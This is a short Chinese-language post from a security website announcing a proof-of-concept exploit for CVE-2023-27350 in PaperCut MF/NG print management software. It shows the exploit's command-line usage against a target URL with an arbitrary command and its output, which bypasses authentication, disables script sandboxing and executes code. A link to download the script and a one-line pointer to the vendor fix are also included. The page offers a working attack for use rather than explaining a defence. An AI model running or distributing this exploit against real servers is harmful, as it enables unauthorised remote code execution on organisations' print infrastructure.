探索网络安全新技术
攀登黑客技术最高峰

CVE-2023-27350:PaperCut MF/NG打印管理软件漏洞POC

漏洞说明

此 POC 使用与滥用内置脚本功能相关联的身份验证绕过漏洞来执行代码。

使用方法

python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

漏洞修复

更新到最新版本或按照 PaperCut 安全公告中的说明进行修复

https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

POC下载

CVE-2023-27350

赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《CVE-2023-27350:PaperCut MF/NG打印管理软件漏洞POC》
文章链接:https://www.wevul.com/598.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册